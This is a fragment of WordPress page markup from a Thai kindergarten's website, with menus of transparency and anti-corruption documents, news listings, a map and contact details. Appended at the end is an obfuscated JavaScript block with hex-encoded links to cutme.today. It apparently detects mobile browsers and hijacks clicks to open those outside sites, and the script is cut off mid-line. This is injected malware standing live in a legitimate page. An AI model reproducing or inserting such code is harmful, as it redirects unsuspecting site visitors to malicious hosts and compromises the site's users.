style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_d11eed-26\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 